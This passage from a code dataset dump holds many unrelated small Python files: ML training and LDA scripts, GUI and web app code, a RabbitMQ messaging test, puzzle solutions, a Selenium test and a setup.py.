'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Top 1-err {top1.val:.4f} ({top1.avg:.4f})\\t'\n 'Top 5-err {top5.val:.4f} ({top5.avg:.4f})'.format(\n epoch, args.epochs, i, 196, batch_time=batch_time, loss=losses,\n top1=top1, top5=top5))\n embedding = np.array(embedding)\n labels = np.array(labels)\n print('------',embedding.shape)\n for kk in range(10):\n print(embedding[kk].shape)\n np.save('./embeddings/' + save_name + '_' + 'emd.npy', embedding)\n np.save('./embeddings/' + save_name + '_' + 'labels.npy', labels)\n \n print('* Epoch: [{0}/{1}]\\t Top 1-err {top1.avg:.3f} Top 5-err {top5.avg:.3f}\\t Test Loss {loss.avg:.3f}'.format(\n epoch, args.epochs, top1=top1, top5=top5, loss=losses))\n return top1.avg, top5.avg, losses.avg\n \n \n def visualize(self, dataloader, classes_id = [5, 2, 1], samples_per_class = 100):\n data = torch.zeros(samples_per_class * len(classes_id), 256, dtype=torch.float32)\n target = torch.zeros(samples_per_class * len(classes_id), dtype=torch.float32)\n cnt = torch.ones(len(classes_id), dtype=torch.long) * samples_per_class\n cur_cnt = 0\n with torch.no_grad():\n for i, (input, y) in enumerate(dataloader):\n output, attens = self.model(input)\n if cnt.sum() == 0:\n break\n for kk in range(input.shape[0]):\n if int(y[kk]) in classes_id and cnt[classes_id.index(y[kk])] > 0:\n data[cur_cnt] = attens[kk]\n target[cur_cnt] = y[kk]\n \n cnt[classes_id.index(y[kk])] = cnt[classes_id.index(y[kk])] - 1\n cur_cnt += 1\n \n return data, target\n\ndef save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):\n directory = \"%s/runs/record_dir/%s/\" % (args.save_dir, args.expname)\n if not os.path.exists(directory):\n os.makedirs(directory)\n filename = directory + filename\n torch.save(state, filename)\n if is_best:\n shutil.copyfile(filename, '%s/runs/record_dir/%s/' % (args.save_dir, args.expname) + 'model_best.pth.tar')\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\ndef adjust_learning_rate(optimizer, epoch):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n if args.dataset.startswith('cifar') or args.dataset == ('tiny-imagenet'):\n lr = args.lr * (0.1 ** (epoch // (args.epochs * 0.5))) * (0.1 ** (epoch // (args.epochs * 0.75)))\n elif args.dataset == ('imagenet'):\n if args.epochs == 300:\n lr = args.lr * (0.1 ** (epoch // 75))\n elif args.epochs > 30:\n lr = args.lr * (0.1 ** (epoch // 30))\n #else:\n # if epoch < 10:\n # lr = args.lr\n # elif epoch < 40:\n # lr = args.lr * 0.1\n # else:\n # lr = args.lr * 0.01\n #lr = args.lr * (0.1 ** (epoch // 10))\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n\ndef get_learning_rate(optimizer):\n lr = []\n for param_group in optimizer.param_groups:\n lr += [param_group['lr']]\n return lr\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n wrong_k = batch_size - correct_k\n res.append(wrong_k.mul_(100.0 / batch_size))\n\n return res\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"cifar/scripts/train_cifar_all_methods.py","file_name":"train_cifar_all_methods.py","file_ext":"py","file_size_in_byte":28485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"156303977","text":"# -*- coding: utf-8 -*-\n# author: Guoanboyu\n# email: guoappserver@gmail.com\n\n#main.pyw\nimport sys\nfrom PyQt4 import QtCore, QtGui\n\nfrom cloud_picture.untitled import Ui_MainWindow\n\nclass MyForm(QtGui.QMainWindow):\n def __init__(self, parent = None):\n QtGui.QMainWindow.__init__(self,parent)\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n\nif __name__ == '__main__':\n app = QtGui.QApplication(sys.argv)\n form = MyForm()\n form.show()\n sys.exit(app.exec_())","sub_path":"cloud_picture/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"312161056","text":"import nltk\nimport time\nimport csv\nfrom gensim import corpora\nfrom gensim.models.ldamodel import LdaModel\nfrom os import listdir\nfrom nltk.corpus.reader import CHILDESCorpusReader\nfrom nltk.stem.snowball import SnowballStemmer\nfrom nltk.corpus import stopwords, wordnet\n\nstart = time.time()\ncorpus_root = nltk.data.find('corpora/childes/data-xml/Eng-USA-MOR/')\nfolders = listdir('C:/nltk_data/corpora/childes/data-xml/Eng-USA-MOR')\n\n#stemmer = SnowballStemmer(\"english\")\n\nsw = stopwords.words('english')\nsw.extend(['xxx', 'yyy', 'www', 'huh', 'yeah','ever', 'even', 'anyway', 'everybody', \n'yes', 'mhm', 'yep', 'uhhuh', 'alright', 'never', 'sometimes', 'either', 'everyone'\n'gonna', 'goin', 'another', 'okay', 'hey', 'anything', 'ready', 'uhuh', 'ouch', 'only', \n'away', 'sure', 'well', 'right', 'okay', 'would', 'around', 'across', 'everything', \n'maybe', 'big', 'little', 'nice', 'wow', 'new', 'cool', 'else', 'ago', 'almost', 'another', \n'ahead', 'always', 'already', 'whoops', 'em', 'wan', 'much', 'nope', 'hum', 'anyways', \n'yet', 'though', 'somethin', 'cha', 'anything', 'somebody', 'may', 'still', 'uhoh', \n'also', 'instead', 'whose', 'without', 'behind', 'anybody', 'any', 'away', 'why', \n'please', 'yay', 'oops', 'any', 'please', 'another', 'something', 'very'])\n#sw = [stemmer.stem(item) for item in sw]\n\nwith open ('animal.csv', 'rb')as f:\n reader = csv.reader(f)\n animal = []\n for row in reader:\n animal.extend(row)\n\nchildes = CHILDESCorpusReader(corpus_root, '.*.xml', lazy=False)\nfiles = childes.fileids()\nresultlist = []\n\nfor filename in files:\n sents = childes.sents(filename)[0]\n for sent in sents:\n result_lower = [item.lower() for item in sent]\n #result_stem = [stemmer.stem(item) for item in result_lower]\n result_clean = [item for item in result_lower if '\\'' not in item \n and '_' not in item and len(item) > 1]\n result = [item for item in result_clean if item not in sw]\n resultlist.append(result)\nprint(resultlist[0])\n\n \ndictionary = corpora.Dictionary(resultlist)\ncorpus = [dictionary.doc2bow(text) for text in resultlist]\n\nlda = LdaModel(corpus = corpus, id2word = dictionary, num_topics = 500)\ntopiclist = lda.print_topics(num_topics = 500, num_words = 50)\nlda.save('childs_sent_500.model')","sub_path":"childes/childes-500-sent.py","file_name":"childes-500-sent.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"15127943","text":"\"\"\" A PyFace widget for a command binding. \"\"\"\n\n\nimport wx\n\nfrom envisage.import_manager import ImportManager\nfrom pyface.api import Widget\nfrom traits.api import Instance\n\nfrom pgv.red.ui.command_library import CommandBinding\nfrom pgv.red.ui.keyboard import get_key_combination_name\n\n\nclass CommandBindingWidget(Widget):\n \"\"\" A PyFace widget for a command binding. \"\"\"\n\n #### 'object' protocol ####################################################\n\n def __init__(self, **traits):\n \"\"\" Create the widget. \"\"\"\n\n # Base class constructor.\n super(CommandBindingWidget, self).__init__(**traits)\n\n # Create the toolkit-specific control that represents the widget.\n self.control = self._create_control(self.parent)\n\n #### 'AddCommandBindingWidget' protocol ####################################\n\n # The command binding that we are editing.\n command_binding = Instance(CommandBinding)\n \n #### Protected 'Widget' protocol ##########################################\n\n def _create_control(self, parent):\n \"\"\" Create the widget's toolkit-specific control. \"\"\"\n\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n panel = wx.Panel(parent, -1)\n panel.SetSizer(sizer)\n panel.SetAutoLayout(True)\n\n key_combination_control = self._create_key_combination_control(\n panel, self.command_binding\n )\n sizer.Add(key_combination_control, 0, wx.RIGHT, 5)\n\n factory_name_control = self._create_command_factory_name_control(\n panel, self.command_binding\n )\n sizer.Add(factory_name_control, 1, wx.EXPAND)\n\n sizer.Fit(panel)\n return panel\n\n #### Private protocol ######################################################\n\n # Used to import command factories.\n _import_manager = Instance(ImportManager, ())\n\n def _create_command_factory_name_control(self, parent, command_binding):\n \"\"\" Create a control for the command factory name. \"\"\"\n\n command_factory_name = command_binding.command_factory_name\n \n text_ctrl = wx.TextCtrl(parent, -1, command_factory_name)\n\n self._set_command_factory_tooltip(\n text_ctrl, command_binding.command_factory_name\n )\n\n def text_changed(event):\n command_binding.command_factory_name = text_ctrl.GetValue()\n\n self._set_command_factory_tooltip(\n text_ctrl, command_binding.command_factory_name\n )\n event.Skip()\n \n text_ctrl.Bind(wx.EVT_TEXT, text_changed)\n\n return text_ctrl\n\n def _set_command_factory_tooltip(self, control, command_factory_name):\n \"\"\" Set the command factory tooltip on a control. \"\"\"\n\n tool_tip = wx.ToolTip(\n tip=self._get_command_factory_docstring(command_factory_name)\n )\n control.SetToolTip(tool_tip)\n \n def _get_command_factory_docstring(self, command_factory_name):\n \"\"\" Return the docstring for the command factory with the given name.\n\n \"\"\"\n\n try:\n command_factory = self._import_manager.import_symbol(\n command_factory_name\n )\n docstring = command_factory.__doc__\n \n except:\n docstring = 'command factory does not exist!'\n \n return docstring\n \n def _create_key_combination_control(self, parent, command_binding):\n \"\"\" Create a control for the key code/modifier combination. \"\"\"\n\n key_code, modifiers = command_binding.key_combination\n \n style = wx.TE_PROCESS_TAB | wx.TE_PROCESS_ENTER\n text_ctrl = wx.TextCtrl(\n parent, -1, get_key_combination_name(key_code, modifiers),\n style = style\n )\n\n def character_entered(event):\n key_code = event.GetKeyCode()\n modifiers = event.GetModifiers()\n\n key_combination_name = get_key_combination_name(key_code, modifiers)\n\n text_ctrl.SetValue(key_combination_name)\n command_binding.key_combination = (key_code, modifiers)\n \n text_ctrl.Bind(wx.EVT_CHAR, character_entered)\n\n return text_ctrl\n\n#### EOF #######################################################################\n","sub_path":"source/pgv/red/ui/command_binding_widget.py","file_name":"command_binding_widget.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"189016290","text":"#!/usr/bin/env python\nimport pika\nimport time\n\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(\n 'rabbitmq.dev.twleansw.com'))\nchannel = connection.channel()\nfor i in range(0, 2) :\n\tchannel.queue_declare(queue='remote_power_switch')\n\tchannel.basic_publish(exchange='',\n\t routing_key='remote_power_switch',\n\t body='POWER_ON')\n\tprint(\" [x] Sent POWER_ON\")\n\ttime.sleep(5) # delays for 5 seconds\n\t\n\tchannel.queue_declare(queue='remote_power_switch')\n\tchannel.basic_publish(exchange='',\n\t routing_key='remote_power_switch',\n\t body='POWER_OFF')\n\ttime.sleep(5) # delays for 5 seconds\n\tprint(\" [x] Sent POWER_OFF\")\n\n","sub_path":"pi3_python/test_mq_send_switch_command.py","file_name":"test_mq_send_switch_command.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"288655822","text":"'''\nSolution:\n1. Insert all new possible words to the Trie.\n2. For each old word (split in the sentence by a space), check whether any subword is present in the Trie as a word\n and if present replace the sub-word with the old word and otherwise leave the old-word as is.\n3. Return the sentence conaining replaced words.\n\nTime Complexity: O(n * L) n is no. of words and L is max length of one word\nSpace Complexity: O(n * L) max space occupied by the Trie; there is also space occupied by new sentence which is again\n O(n * L) and so total space complexity would be O(n * L)\n\n--- Passed all testcases on Leetcode successfully\n'''\n\n\nclass TrieNode(object):\n\n def __init__(self):\n self.children = [None for i in range(26)]\n self.word = None\n\n\nclass Trie(object):\n\n def __init__(self):\n self.root = TrieNode()\n\n def insert(self, word):\n\n # function to insert a word in a Trie data structure\n\n # initialize to the root of the trie as current node\n currNode = self.root\n\n # traverse the trie until we hit the length of word to be inserted\n for i in range(len(word)):\n currChar = word[i]\n if (currNode.children[ord(currChar) - ord('a')] == None):\n currNode.children[ord(currChar) - ord('a')] = TrieNode()\n currNode = currNode.children[ord(currChar) - ord('a')]\n\n currNode.word = word\n\n\nclass ReplaceWords(object):\n def replaceWords(self, dict, sentence):\n \"\"\"\n :type dict: List[str]\n :type sentence: str\n :rtype: str\n \"\"\"\n # initialize a Trie\n trie = Trie()\n\n # insert all words to a Trie present in the dict\n for word in dict:\n trie.insert(word)\n\n # intialize a list to append all new words replacing old words\n newWords = []\n\n # traverse all words\n for word in sentence.split():\n\n # traverse the entire old word until you hit a sub-word\n currNode = trie.root\n for i in range(len(word)):\n currChar = word[i]\n if (currNode.children[ord(currChar) - ord('a')] == None or currNode.word != None): # condition to break\n break\n currNode = currNode.children[ord(currChar) - ord('a')]\n\n newWord = currNode.word # take the new word to be the subword till we traversed\n\n if (newWord == None): # if new word not a word, then append old word itself\n newWords.append(word)\n else: # else append new word\n newWords.append(newWord)\n\n return ' '.join(newWords) # join the list of new words as a string\n","sub_path":"ReplaceWords.py","file_name":"ReplaceWords.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"629983861","text":"from flask import Flask, render_template, redirect, url_for, request\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Restaurant, MenuItem\n\napp = Flask(__name__)\n\n#create engine to reference db\nengine = create_engine('sqlite:///restaurantmenu.db')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind = engine)\nsession = DBSession()\n\n\n@app.route('/')\ndef hello():\n\toutput = \"\"\n\toutput += \"hello!\"\n\treturn output\n\n@app.route('/restaurants')\ndef restaurants():\n\trestaurants = session.query(Restaurant).all()\n\treturn render_template(\"restaurant.html\", restaurants = restaurants)\n\n@app.route('/restaurants/new', methods=['GET','POST'])\ndef newRestaurant():\n\tif request.method == 'POST':\n\t\tnewRestaurant = Restaurant(name = request.form['name'])\n\t\tsession.add(newRestaurant)\n\t\tsession.commit()\n\t\treturn redirect(url_for('restaurants'))\n\treturn render_template(\"newrestaurant.html\")\n\n\n@app.route('/restaurants//edit', methods=['GET','POST'])\ndef editRestaurant(restaurant_id):\n\trestaurant = session.query(Restaurant).filter_by(id = restaurant_id).one()\n\tif request.method =='POST':\n\t\trestaurant.name = request.form[\"newName\"]\n\t\tsession.add(restaurant)\n\t\tsession.commit()\n\t\treturn redirect(url_for('restaurants'))\n\treturn render_template('editrestaurant.html',restaurant = restaurant)\n\n\n@app.route('/restaurants//delete', methods=['GET','POST'])\ndef deleteRestaurant(restaurant_id):\n\trestaurant = session.query(Restaurant).filter_by(id = restaurant_id).one()\n\tif request.method == 'POST':\n\t\tsession.delete(restaurant)\n\t\tsession.commit()\n\t\treturn redirect(url_for('restaurants'))\n\treturn render_template('deleterestaurant.html',restaurant=restaurant)\n\n\n\n@app.route('/restaurants//menu')\ndef restaurantMenu(restaurant_id):\n\titems = session.query(MenuItem).filter_by(restaurant_id = restaurant_id).all()\n\treturn render_template('menu.html',items = items)\n\treturn \"the menu items for restaurant with id\"\n\n@app.route('/restaurants//menu/new')\ndef newMenuItem(restaurant_id):\n\treturn \"creating a new menu item\"\n\n@app.route('/restaurants//menu//edit')\ndef editMenuItem():\n\treturn \"editing menu item with id\"\n\n@app.route('/restaurants//menu//delete')\ndef deleteMenuItem():\n\treturn \"confirmation for deleting menu item with id\"\n\nif __name__ == '__main__':\n\tapp.debug = True\n\tapp.run(host='0.0.0.0', port=5000)","sub_path":"vagrant/Lesson5/restaurantserver.py","file_name":"restaurantserver.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"31934968","text":"from collections import deque\nT=int(input())\n\ndef bfs(x,y):\n global cnt\n queue=deque()\n queue.append((x,y))\n cnt=0\n \n # visited[x][y]=True\n while queue:\n x,y=queue.popleft()\n cnt+=1\n for i in range(4):\n nx=x+dx[i]\n ny=y+dy[i]\n if nx>=N or ny>=M or nx<0 or ny<0:\n continue\n if graph[nx][ny]==0:\n continue\n if graph[nx][ny]==1:\n graph[nx][ny]=0\n queue.append((nx,ny))\n return cnt\n \nfor t in range(T):\n count=0\n dx=[-1,1,0,0]\n dy=[0,0,-1,1]\n M,N,K=map(int,input().split()) #가로, 세로, 배추 위치 개수\n graph=[[0]*(M+1) for _ in range(N+1)]\n \n for k in range(K):\n x,y=map(int,input().split())\n graph[y][x]=1 #x가로 y세로\n \n for i in range(N+1): #i 세로 j 가로\n for j in range(M+1):\n if graph[i][j]==1:\n # print(bfs(i,j))\n bfs(i,j)\n count+=1\n \n print(count)","sub_path":"baekjoon/단계별 문제/1012.py","file_name":"1012.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"412345666","text":"import glob\nimport numpy as np\n\nfiles = glob.glob('./codedata/*/*', recursive=True)\n\n# Split files into test/train set\nnp.random.seed(1000) # For reproducability\nnp.random.shuffle(files)\nN = int(float(len(files))*0.8) # Do an 80-20 split for training/validation\n\ndata = dict(\n train=files[:N],\n valid=files[N-len(files):],\n)\n\nnum_nq_examples = dict(train=N, valid=len(files)-N)\n\nprint(num_nq_examples)\n","sub_path":"globit.py","file_name":"globit.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"505681564","text":"from tkinter import *\r\nroot = Tk()\r\n\r\nroot.geometry('300x200')\r\nroot.title(\" ATTRIBUTES TUTORIAL \")\r\n# start attributes\r\n'''\r\nimportant label attributes\r\ntext-adds the text\r\nbg-backgroung \r\nfg-foreground\r\nfont-set the font\r\npadx-x padding\r\npady-y padding\r\nrelief-borderstyling-SUNKEN,RAISED,GROOVE,RIDGE\r\n\r\n\r\nimportant pack attributes\r\nanchor=nw,ew,es,sw,etc\r\nside=top,bottom,left,right\r\nfill x & Y\r\npadding- x & y \r\n'''\r\nsaqib = Label(text='''“Dream is not that which \r\nyou see while sleeping it is\r\n something that does not let you sleep.”\r\n― A P J Abdul Kalam''', bg='orange', fg='blue', padx=15, pady=50, font=\"comicsansms 19 bold\", borderwidth=5, relief=SUNKEN)\r\n\r\nsaqib.pack(side=BOTTOM, anchor=\"sw\", fill=X, padx=20, pady=50)\r\nroot.mainloop()\r\n","sub_path":"attributes.py","file_name":"attributes.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"123515168","text":"import os\nimport sys\n\n\nfiles = [\n\t\"Server.cs\",\n\t\"Threading.cs\",\n\t\"Logger.cs\",\n\t\"ProtocolFormat.cs\",\n\t\"NetworkCommand.cs\",\n\t\"Constants.cs\",\n\t\"BinaryConverter.cs\",\n\t\"NetworkName.cs\"\n]\n\nbuild_exe = \"--exe\" in sys.argv\n\n# if \"--exe\" in sys.argv:\n# \tprint (\"Building standalone server\")\n# \tcall = \"csc -out:Server2.exe Program.cs -r:MorkoNetwork.dll\"\n# else:\n\nprint (\"Building MorkoNetwork library\")\ncall = \"csc -out:MorkoNetwork.dll -unsafe -debug -target:library {}\".format(\" \".join(files))\n\nos.system(call)\n","sub_path":"Network/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"287985369","text":"import keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nimport tensorflow as tf\n\n\n# In[271]:\n\n\ndef model(num_units, dropout = 0.0):\n \n classifier = Sequential()\n classifier.add(Dense(4*num_units,activation='relu',kernel_initializer='uniform', input_dim = 4039))\n classifier.add(Dropout(dropout))\n classifier.add(Dense(2*num_units, activation = 'relu', kernel_initializer='uniform'))\n classifier.add(Dropout(dropout))\n classifier.add(Dense(num_units, activation = 'relu', kernel_initializer='uniform'))\n classifier.add(Dense(1, activation='sigmoid', kernel_initializer='uniform'))\n return classifier\n\n\n# In[272]:\n\n\nclassifier = model(5, 0.3)\n\n\n# In[273]:\n\n\noptimizer = keras.optimizers.Adam(lr = 0.0001)\n\n\n# In[274]:\n\n\nclassifier.compile(optimizer=optimizer,loss='binary_crossentropy',metrics=['accuracy'])\n\n\n# In[275]:\n\n\nclassifier.fit(xTrain,yTrain,batch_size = 128, epochs = 200)\n\n\n# In[276]:\n\n\ny_p = classifier.predict(xTrain)\n\n\n# In[277]:\n\n\ny_p_1 = classifier.predict(xval)\n\n\n# In[278]:\n\n\nerror = 0\n#y_pred_1 = y_pred[:, 1]\nj = 0\nfor i in yTrain:\n #print(j)\n error1 = i - y_p[j][0]\n #print(str(i) + \" \" + str(y_pred_1[j])+\" \" + str(abs(error1)))\n error = error + abs(error1)\n j = j +1\n\nmse = error/len(y_p)\nprint(mse)\nprint(1 /(1+mse))\n\n\n# In[279]:\n\n\nerror = 0\n#y_pred_1 = y_pred[:, 1]\nj = 0\nfor i in yval:\n #print(j)\n error1 = i - y_p_1[j][0]\n #print(str(i) + \" \" + str(y_pred_1[j])+\" \" + str(abs(error1)))\n error = error + abs(error1)\n j = j +1\n\nmse = error/len(y_p)\nprint(mse)\nprint(1 /(1+mse))\n\n\n# In[280]:\n\n\ny_p_2 = classifier.predict(X_test)\n\n\n# In[281]:\n\n\nprint(y_p_2)\n\n\n# In[299]:\n\n\nprint(print(id_test))\n\nprint(len(y_p_2))\nid_test.count()\n\n\n# In[301]:\n\n\nid_test.head()\n\n\n# In[313]:\n\n\nids = id_test.iloc[:].values\nprint(ids)\n\n\n# In[323]:\n\n\nv_id = []\nj = 0\n\nfor i in ids:\n if not pd.isnull(i):\n v_id.append(j)\n j = j+1\n\n\n# In[324]:\n\n\nprint(v_id)\n\n\n# In[325]:\n\n\npout = y_p_2[v_id]\niout = ids[v_id]\n\n\n# In[326]:\n\n\npredictions = pd.DataFrame(pout, columns=['is_goal'])\nidss = pd.DataFrame(iout, columns=['shot_id_number'])\npredictions = pd.concat((idss, predictions), axis = 1)\npredictions.to_csv('result1.csv', sep=\",\", index = False)\n\n\n","sub_path":"Nn.py","file_name":"Nn.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"650781147","text":"#!/user/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@Author: ChenHanping\n@Email:\n@QQ:\n\n@date: 2019/12/3\n@description:\n\"\"\"\nimport json\nimport copy\nfrom datetime import datetime,timedelta\nimport ctx\n# from src import ctx\nfrom service.handlers.base import BaseHandler\nfrom utils import api_util\n\ndef _db():\n return ctx.modledb['model_result_simulation']\n\ndef tt(date):\n #datetime转换为字符串T%H%M\n at = ((date.minute) // 15) * 15\n if at==0:\n at='00'\n t = date.strftime('T%H')+str(at)\n return t\n\ndef conversion(target1,date,t,staTime,endTime):\n DATA = {}\n res = []\n # 预测数据\n for target in target1:\n statusYC = {'TARGET_ID': target, 'DATA_DATE': date, 'DATA_TYPE': 1, 'SCADATYPE': 5}\n frequencyYC = {'TARGET_ID': target, 'DATA_DATE': date, 'DATA_TYPE': 1, 'SCADATYPE': 7}\n if target == 'PMP-1':\n for v in _db().find_one(frequencyYC, {'_id': 0, t: 1}).values():\n for i in v:\n if i['time'] < endTime:\n DATA['id'] = target\n DATA['time'] = i['time']\n DATA['status'] = i['status']\n DATA['frequency'] = i['frequency']\n Date = copy.copy(DATA)\n res.append(Date)\n else:\n for a in _db().find_one(statusYC, {'_id': 0, t: 1}).values():\n for i in a:\n if i['time'] < endTime:\n DATA['id'] = target\n DATA['time'] = i['time']\n DATA['status'] = i['status']\n DATA['frequency'] = i['frequency']\n Date = copy.copy(DATA)\n res.append(Date)\n # 回算数据\n for target in target1:\n statusHS = {'TARGET_ID': target, 'DATA_DATE': date, 'DATA_TYPE': 0, 'SCADATYPE': 5}\n # frequencyHS = {'TARGET_ID': target, 'DATA_DATE': date, 'DATA_TYPE': 0, 'SCADATYPE': 7}\n for v in _db().find_one(statusHS, {'_id': 0, t: 1}).values():\n res2 = [m for m in v]\n res2.sort(key=lambda x: x['time'], reverse=True)\n for m in res2:\n DATA['id'] = target\n DATA['time'] = m['time']\n DATA['status'] = m['status']\n if DATA['time'] < staTime:\n DATA['time'] = staTime + \" 00:00:00\"\n Date = copy.copy(DATA)\n res.append(Date)\n break\n Date = copy.copy(DATA)\n res.append(Date)\n # 排序\n res.sort(key=lambda x: x['time'])\n return res\n\nclass SchHadl(BaseHandler):\n async def get(self):\n # 获取编号\n target = self.get_argument('target_id', None)\n if not target:\n self.return_failed()\n return\n target1 = target.split(',')\n #获取时间,时间为空用当前时间\n newTime = self.get_argument('new_time', None)\n if not newTime:\n NTime = datetime.now()\n else:\n NTime = datetime.strptime(newTime, \"%Y-%m-%d %H:%M:%S\")\n t = tt(NTime)\n #获取日期\n date = NTime.strftime('%Y%m%d')\n #开始时间,结束时间\n staTime = NTime.strftime('%Y-%m-%d')\n endTime = (NTime+timedelta(days=1)).strftime('%Y-%m-%d')\n result = await api_util.call_blocking(conversion, target1,date,t,staTime,endTime)\n self.write(json.dumps(result, ensure_ascii=False))\n\n\n\n\n","sub_path":"src/service/handlers/schedule_handler.py","file_name":"schedule_handler.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"546702562","text":"from selenium.webdriver.common.by import By\nfrom selenium import webdriver\n\ndriver = webdriver.Chrome(executable_path=r\"C:\\Users\\yordi\\Automation\\python-selenium-automation\\chromedriver.exe\")\ndriver.maximize_window()\ndriver.implicitly_wait(5)\n\n\ndriver.get('https://www.amazon.com/')\n\ndriver.find_element(By.ID, 'nav-cart-count-container').click()\n\nactual_result = driver.find_element(By.XPATH, \"//div[@class='a-row sc-your-amazon-cart-is-empty']/h2\").text\nexpected_result = 'Your Amazon Cart is empty'\nassert expected_result == actual_result, f'Expected{expected_result},but got {actual_result}'","sub_path":"features/Test_amazon_cart.py","file_name":"Test_amazon_cart.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"119177163","text":"import numpy\nfrom fqe import Wavefunction\nimport cProfile\n\nif __name__ == '__main__':\n norb = 10\n nel = norb\n sz = 0\n h1e_spa = numpy.zeros((norb, norb), dtype=numpy.complex128)\n h2e_spa = numpy.zeros((norb, norb, norb, norb), dtype=numpy.complex128)\n h3e_spa = numpy.zeros((norb, norb, norb, norb, norb, norb),\n dtype=numpy.complex128)\n\n for i in range(norb):\n for j in range(norb):\n for k in range(norb):\n for l in range(norb):\n for m in range(norb):\n for n in range(norb):\n h3e_spa[i, j, k, l, m, n] += (i + l) * (j + m) * (\n k + n) * 0.002\n\n wfn = Wavefunction([[nel, sz, norb]])\n wfn.set_wfn(strategy='random')\n\n cProfile.run('test = wfn.apply(tuple([h1e_spa, h2e_spa, h3e_spa]))',\n '3body.profile')\n # test = wfn.apply(tuple([h1e_spa, h2e_spa, h3e_spa]))\n\n # rdm3 = wfn.rdm123(wfn)\n # energy = numpy.tensordot(h3e_spa, rdm3[2],\n # axes=([0, 1, 2, 3, 4, 5], [0, 1, 2, 3, 4, 5]))\n # print(energy)\n import pstats\n profile = pstats.Stats('3body.profile')\n profile.sort_stats('cumtime')\n profile.print_stats(30)\n","sub_path":"profiling/profile_3_body.py","file_name":"profile_3_body.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"43200693","text":"from django.urls import path\nfrom . import views\nfrom django.contrib.auth import views as auth_views\nurlpatterns = [\n path('', views.list,name='blog'),\n path('/', views.post, name='post'),\n #path('contact/', views.contact, name='contact'),\n path('register/', views.register, name=\"register\"),\n path('login/',auth_views.LoginView.as_view(template_name=\"pages/login.html\"), name=\"login\"),\n path('logout/',auth_views.LogoutView.as_view(next_page='/'),name='logout'),\n]\n","sub_path":"webpython/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"264584098","text":"# Copyright 2018 The Pontem Authors. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Cloud SQL Replicator setup.\"\"\"\n\nfrom setuptools import find_packages\nfrom setuptools import setup\n\nfrom google.cloud.pontem.sql import replicator\n\nNAMESPACE_PACKAGES = [\n 'google',\n 'google.cloud'\n]\n\nREQUIRES = [\n 'absl-py>=0.6.1',\n 'future>=0.17.1',\n 'futures>=3.0.5',\n 'google-api-core>=1.6.0',\n 'google-api-python-client>=1.7.6',\n 